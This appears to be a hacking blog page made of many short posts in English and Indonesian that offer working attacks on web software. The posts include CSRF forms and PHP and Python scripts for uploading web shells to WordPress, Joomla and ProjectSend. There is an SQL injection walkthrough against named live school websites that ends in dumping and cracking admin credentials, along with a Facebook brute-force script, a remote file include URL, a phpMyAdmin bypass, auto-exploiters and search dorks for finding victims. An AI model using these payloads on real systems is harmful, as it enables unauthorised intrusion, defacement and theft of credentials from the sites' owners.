Showing posts with label Hacking. Show all posts
  • GRABBER SQLI SITES FROM IP


    Hi Guys i hope ur fine insha'Allah

    Today i'll sharing strong tool is for get sites from ip

    get  sqli infected sites from ip

    so tool using with browser or upload it on ur shell

    tutorial vedio :

    Tool link 

    i hope all is clear
    Source
  • Joomla com_cckjseblod auto exploiter


    Hi All i hope u are fine incha'Allah

    i want share my new auto exploiter is for exploit LFI in joomla

    this exploit can give us configs :)

    watch video for know how is work


    Script Here

    i hope all clear

    This Site Source http://magsec.blogspot.com
  • kcfinder exploit upload shell


    Hi Guys today i want post a new exploit descovered today by INCEF-Team 
    is An exploit for upload shell in kcfinder

    code of exploit :


    <form method="POST" action="site/path/kcfinder/upload.php"
    enctype="multipart/form-data">
    <input type="file" name="Filedata" /><button>~/ ndsxf</button>
    </form>

    if site infected will show u : "Unknown error"

    shell format is : shell.php.ndsxf

    Dork : inurl:/kcfinder/upload.php

    and shell dir is  : site/path/upload/files/shell.php.ndsxf

    Post Copy By :Mr.MaGnoM
  • wordpress headway upload shell exploit


    After long time finaly we get an exploit for upload shell in wordpress 
    in theme hadway all details u will find it in video 
    Tool link : here
     i hope all clear :)
     
     
     
    Tags :
     wordpress headway upload shell exploit
     exploit wordpress headway upload shell exploit
     tutorial deface wordpress headway upload shell exploit
     cara deface wordpress headway upload shell exploit

  • SQL INJECTION ON CMS BALITBANG

    sql injection on cms balitbang
    selamat datang dan selamat berkunjung para injector...:D
    kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
    seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
    tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
    ok..lets start..

    alat2 yang di butuhkan

    -kompi (wajib hukumnya.. :D)
    -koneksi internet
    -browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
    -hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
     http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi

    otomatis terdownload,kemudian pilih yes..otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
    -untuk dorknya silahkan berkreasi sendiri..

    anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

    kita buka browser mozilla kita ..
    kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
    http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana


    dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
    selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
    lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom  8


    selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
    ternyata muncul muncul angka ajaib yaitu 2 dan 3.




    selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
    buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

    kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)



    dannnn...wala...... muncul semua daleman webnya..;D


    selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D

    langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.

    sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

    NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..

    Mampir Juga Ke Sumber ; http://tutorial-sqli.blogspot.com
  • DIOS (dump in one shoot) dengan hackbar modif

    dios (dump in one shoot) dengan hackbar modif

    halo sobat injector..
    kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
    kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
    kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
    di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan  waf sebagai pengamanan website

    untuk hackbar modif bisa di donlod di sini...http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi

    ok langsung aja menuju tekape..

    sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9

    pertama kita test url dengan menambahkan tanda kutip (')



    muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.

    lakukan perintah order by hingga menemukan kolom eror.

    ternyata pada web ini eror terdapat pada kolom 7

    selanjutnya gunakan perintah union select
    angka ajaib yang muncul 3 dan 4

    ok next.. jika selama ini kita hanya tau group_concat(table_name)  untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
    klik union based dios mysql,dios by madblod...


    dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....

    jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...


    happy injecting...

    Sumber
  • plugins vibe-shortcodes upload

    Author : Rumput

    Dork :/wp-content/plugins/vibe-shortcodes/ ( Use Brain )

    Exploit : http://www.yaaka.cc/wp-content/plugins/vibe-shortcodes/upload_handler.php
    Vuln : {"error":"No files were uploaded."} 

    Csrf :

    <form enctype="multipart/form-data"
    action="http://oni.chan/wp-content/plugins/vibe-shortcodes/upload_handler.php" method="post">
    Your File: <input name="qqfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>


    Shell :wp-content/uploads/years/month/shell.php Atau Bisa Dilihat Sendiri Nanti Muncul Dir Dan Nama Shellnya

  • Wordpress Fileuploader [ CSRF ]

    Author : Rumput

    Dork : inurl:/wp-content/themes/NameThemes ( Use Brain )

    Exploit : /wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php

    Csrf :

    <form enctype="multipart/form-data"
    action="http://oni.chan/wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php" method="post">
    Your File: <input name="qqfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>


    Shell :wp-content/uploads/years/month/shell.php

    Ganbate Ne Cari Themesnya  :v
  • Exploit Cameleon

    Author : Rumput

    Dork : inurl:/wp-content/themes/cameleon ( Use Brain )

    Exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

    Csrf :
    <form enctype="multipart/form-data"
    action="http://www.whitepeaksoutfitters.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php" method="post">
    Your File: <input name="qqfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>

    Shell :wp-content/uploads/years/month/shell.php
  • Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability


    Hallow semua
    Ketemu lagi dengan saya, kali saya akan memberi tutorial deface, sesuai judul di atas, langsung aja

    Author : Indonesian Cyber Freedom

    Dork : inurl:/wp-content/themes/evolve/js/ ( Bisa ente kembangkan lagi )

    Exploit : /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php

    Code CSRF :
    <form enctype="multipart/form-data"
    action="target.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
    Your File: <input name="qqfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>

    Cari target dengan menggunakan dork

    klau vuln muncul seperti gambar seperti di bawah ini :


    Buka code CSRF nya :



    Buka CSRF tadi di browser ente, upload shell, klau berhasil akan seperti ini :


    Shell access : http://site.com/wp-content/uploads/years/month/shell.php

    Klau ada yg blom pnya shell, bisa download di sini
    Download Priv8 Shania Shell

    Sekian dan terima kasih =)

    Source :
    Visit our forum
  • Tutorial Hack facebook dengan brutoforce [ perl ]

    yosh kali ini lagi matik aka malas ketik
    jadi langsung aja


    Perl bisa cari di google
    Scriptnya   

    Caranya Simple aja

    Ketik Command
    cd c:\Dwimperl <- tergantung milik kalian masing masing

    lalu kemudian
    perl fb.pl username list.txt

    disini fb.pl adalah script yang anda download tadi tergantung anda savenya jadi nama apa tapi yang pastinya ekstensi .pl
    lalu list.txt kalian isi dengan list password bisa kalian cari wordlistnya di google

    sekian saja dari saya terimakasih
  • Joomla com_myblog exploit

    Langsung aja gausah banyak bacod :v

    expliot "joomla com_myblog"

    Dork: no dork for child [ Use your brain ]

    Exploit: people_hurt/index.php?option=com_myblog&task=ajaxupload

    Vuln code : {error: 'No file has been uploaded.', msg: '' }

    Type file : jpg, gif, jpeg, bmp, swf, doc etc.

    Ubah shell anda menjadi yourshell.php.xxxjpg
    Saran: upload dulu uploader, Karena file yg diminta ukurannya kecil.

    Code php:
    <?php
    $uploadfile="yourshell.php.xxxjpg";
    $ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('fileToUpload'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>

    Shell acces :
    target/images/yourshell.php.xxxjpg
    target/images/0/yourshell.php.xxxjpg
    target/images/blog/yourshell.php.xxxjpg

    Oke segitu aja  :sibuk:

    Author : people_hurt - Indonesian Cyber Freedom
  • Com_adsmanager Auto Exploiter


    Assalamualaikum =))
    karena gue males ngetik jadi gue coppas dari postingan gue sebelumnya :v

    sekarang gue mau share script com_adsmanager scanner+autoexploiter
    buat kalian yang suka mainan com_adsmanager, biar ga ribet, pake ini ;)

    cara pake:

    php adsmanager.php kerupuk.txt

    adsmanager.php = script formcraft scanner+autoexploiter
    kerupuk.txt = site yang mau di scan+autoexploit
     screenshot:
    *btw itu gue coba upload 3x jadi ada loader_3.php nya, kalo baru upload sekali pasti loader.php ga ada no nya :3 wkwk
     kalo udah beres, kita liat site yang udah ke upload shell kita di ads.html
    screenshot :


    tertarik?
    download disini adsmanager.zip
    baca file README.txt

    kalo ga keberatan nitip nick: Kerupuk
    wkwkw :v

    sekian, thanks for reading :) 

    sumber : http://kerupukghost.blogspot.com
    shoots: ZeynnymouZ
  • Auto Exploiter com_adsmanager with xampp

    Bahan:
    -auto.php ( http://pastebin.com/dqRt7ZeT ) yang ane recoded dari script scan+upload shell milik bang Tu5b0l3d
    -shell andela milik bang Syahrul Ramadhan ( http://pastebin.com/XS46vPpU )simpan shell dengan ext jpg (andela.jpg)
    Caranya Tinggal Masukin Dork aja grin emotikon
    (kalo website vuln tapi upload shell gagal berarti shell tidak bisa di akses atau Forbidden








    Sumber Show Off Incef
  • Formcraft Auto Exploiter

    Assalamualaikum =))
    sekarang gue mau share script formcraft scanner+autoexploiter
    buat kalian yang suka mainan formcraft, biar ga ribet, pake ini ;)

    cara pake:

    php formcraft.php kerupuk.txt

    formcraft.php = script formcraft scanner+autoexploiter
    kerupuk.txt = site yang mau di scan+autoexploit
     screenshot:


    kalo udah beres, kita liat site yang udah ke upload shell kita di f.htm
    screenshot :

    tertarik?
    download disini formcraft.zip
    baca file README.txt

    kalo ga keberatan nitip nick: Kerupuk
    wkwkw :v

    sekian, thanks for reading :)

    Sumber : http://kerupukghost.blogspot.com
  • Bypass Login PhpMyAdmin [ By Mr.ApaPedulimu ]

    hai kali ini saya kembali dengan tutor kecil yaitu Bypass Login PhpMyAdmin
    biasanya anda setiap mau login ga bisa masuk login area atau nout found
    jangan dibuang
    coba menggunakan mysql intertace jika tidak bisa site/phpmyadmin/dbhost atau bisa coba buka db host saja percaya tidak percaya itu ada pengaruhnya
    kali ini saya memberi 1 target
    silakan kalian coba
    dengan cara diatas gagal semua lalu apa anda akan membuangnya
    eits tunggu dulu
    cara bypass cukup mudah
    hanya mengubah link menjadi site/"dh"_phpmyadmi/dbhost tanpa kutip
    atau coba LIVE TARGET  
    cukup mudahkan ^_^
    silakan kalian coba gali site yang terbuang :v
    sekian dari saya trimakasih

     Klik gambar bantu like fp boleh lah :v
    https://www.facebook.com/pages/MrApaPedulimu/1517342925146413?refid=46&sld=eyJzZWFyY2hfc2lkIjoiNDJkMWQyY2QyZjNhZTY2Y2U0MTVhY2UzNGNmODlmZTEiLCJxdWVyeSI6Ik1yLkFwYVBlZHVsaW11Iiwic2VhcmNoX3R5cGUiOiJTZWFyY2giLCJzZXF1ZW5jZV9pZCI6MTc5NjcwMzE1NSwicGFnZV9udW1iZXIiOjEsImZpbHRlcl90eXBlIjoiU2VhcmNoIiwiZW50X2lkIjoxNTE3MzQyOTI1MTQ2NDEzLCJwb3NpdGlvbiI6MCwicmVzdWx0X3R5cGUiOjI3NH0%3D

    sampai jumpa lagi
  • Tutorial Deface In Android With Exploit Revslider + Edit post with phpmyadmin

    Yosh kali ini saya kembali dengan tutorial baru setelah lama ga post 
     kali ini kita akan membahas Tutorial Deface In Android With Exploit Revslider  
    ok langsung saja,mengenail tool bisa menggunakan dari saya DISINI atau menggunakan milik kalian masing" yang telah diupload ke web atau bisa menggunakan KSWEB untuk upload di localhost
    membukanya dengan cara http://localhost:8080/nama.php
    jika kita sudah membuka tools masukan site dan get config 
    kalau yang dari tools saya gak make http:// or https://
    kalo kalian yang belum tau bisa gunakan $host='http://'; agar ga repot nambah http:// or https://
    lalu tambah ($host) di $dn=($bda).($linkof); menjadi $dn=($host) .($bda).($linkof);
    catatan ini kalau script yang dari BLOG saya
    oke kita lanjut lagi, begini tampilan lokasi setelah kita get config

     
         
    selanjutnya kita buka tab baru buka dengan nama db host saja bisa contoh dari ss mysql.fivestarlaw.us
    atau bisa juga menggunakan http://www.fivestarlaw.us/dh_phpmyadmin/mysql.fivestarlaw.us
     lalu masukan db username dan db password 
    setelah masuk klik user ribagian sebelah kiri 
     
    lalu diatas kelik browse 
     
    lalu berikutnya kelik gambar pensil atau artinya edit untuk mengubah password
     setelah itu ganti password dengan password anda yang sudah di hash ke md5 bisa hash DISINI

    kalo sudah tinggal login dan edit  atau upload seperri biasa bagi yang belum tau bisa cari di site ini
    berhubung ini ga ada admin login saya kasi tambahan edit post lewat phpmyadmin 
    seperti sebelumnya ambil disebelah kiri lalu  klik post  kemudian klik pensil lagi
    jika sudah edit post yg sudah ada dengan kata kata kamu lalu save 

    untuk lokaai post liat yang paling bawah di SS ada link itulah link yang kita edit
    terimakasih sebelumnya jika ada yang belum mengerti silakan bertanya 
    maaf template masi acak acakan -_- 
    sampai jumpa di post berikutnya 




  • Joomla Component com_adsmanager Remote File Include

    Joomla Component com_adsmanager Remote File Include
    ==============================================================
     
    ####################################################################
    .:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
    .:. Script         : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
    .:. Dork           : inurl:"com_adsmanager"
     
    ####################################################################
     
    ===[ Exploit ]===
     
    www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]
     
    ####################################################################
     
    Sumber :  https://www.exploit-db.com
  • ProjectSend Multiple Vulnerabilities

    #[+] Author: TUNISIAN CYBER
    #[+] Title: ProjectSend Multiple Vulnerabilities
    #[+] Date: 25-04-2015
    #[+] Vendor: http://www.projectsend.org/
    #[+] Download:http://www.projectsend.org/download/67/
    #[+] Type: WebAPP
    #[+] Tested on: KaliLinux (Debian)
    #[+] Twitter: @TCYB3R

    It's a long one so let's start...

    I/ CSRF: Add Admin

    <html>
    <head>
    <title>ProjectSend CSRF (Add User)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="CSRF OPS" />
          <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <استبدال script>
    استبدال document.getElementById("CSRF").submit();
    </استبدال script>
      </body>
    </html>

    0x0Proof:
    http://i.imgur.com/t77Plve.png

    II/ CSRF: Change Admin Password:
    <html>
    <head>
    <title>ProjectSend CSRF (Change Password)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="User changed" />
          <input type="hidden" name="add_user_form_user" value="admin" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="newemail@opss.net" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <استبدال script>
    استبدال document.getElementById("CSRF").submit();
    </استبدال script>
      </body>
    </html>

    III/ XSS_1 (index.php):
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 78

    0x0Proof:
    http://i.imgur.com/TDfFDU3.png

    IV/ XSS_2 (clients.php):
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cاستبدال script%3Ealert%28%220000%22%29%3B%3C%2Fاستبدال script%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/ywf8JdF.png

    V/XSS_3 (actions-log.php)
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cاستبدال script%3Ealert%28%220000%22%29%3B%3C%2Fاستبدال script%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/cVKIhj3.png

    VI/ File Upload:
    (Exploit oirignally found by Fady Mohamed Osman )

    Rewrittend by TUNISIAN CYBER

    #!/usr/bin/env python
    import requests
    print"+---------------------------------------+"
    print"| ProjectSend File Upload Vulnerability |"
    print"+---------------------------------------+"

    vuln = raw_input('Vulnerable Site:')
    fname = raw_input('EvilFile:')
    with open(fname, 'w') as fout:
        fout.write("<?php phpinfo() ?>")
    url = vuln +'/process-upload.php' +'?name=' + fname
    files = {'file': open(fname, 'rb')}
    result = requests.post(url, files=files)
    print "===>" +vuln+"/upload/files/"+fname




    Sumber : http://www.sec4ever.com
  • HotBot auto Dorker



    Hi Guys

    after long Absence because study and some shits in real life

    i'm bak to share my privat tools with all

    today i gona show u old tool coded by me in 2014 but is gold tool and i never shared it

    is a dorker of http://www.hotbot.com/ with php

    is good site for dorking :D and grabbing

    watch vedio



    Tool Here

    Thanks : http://magsec.blogspot.com
  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo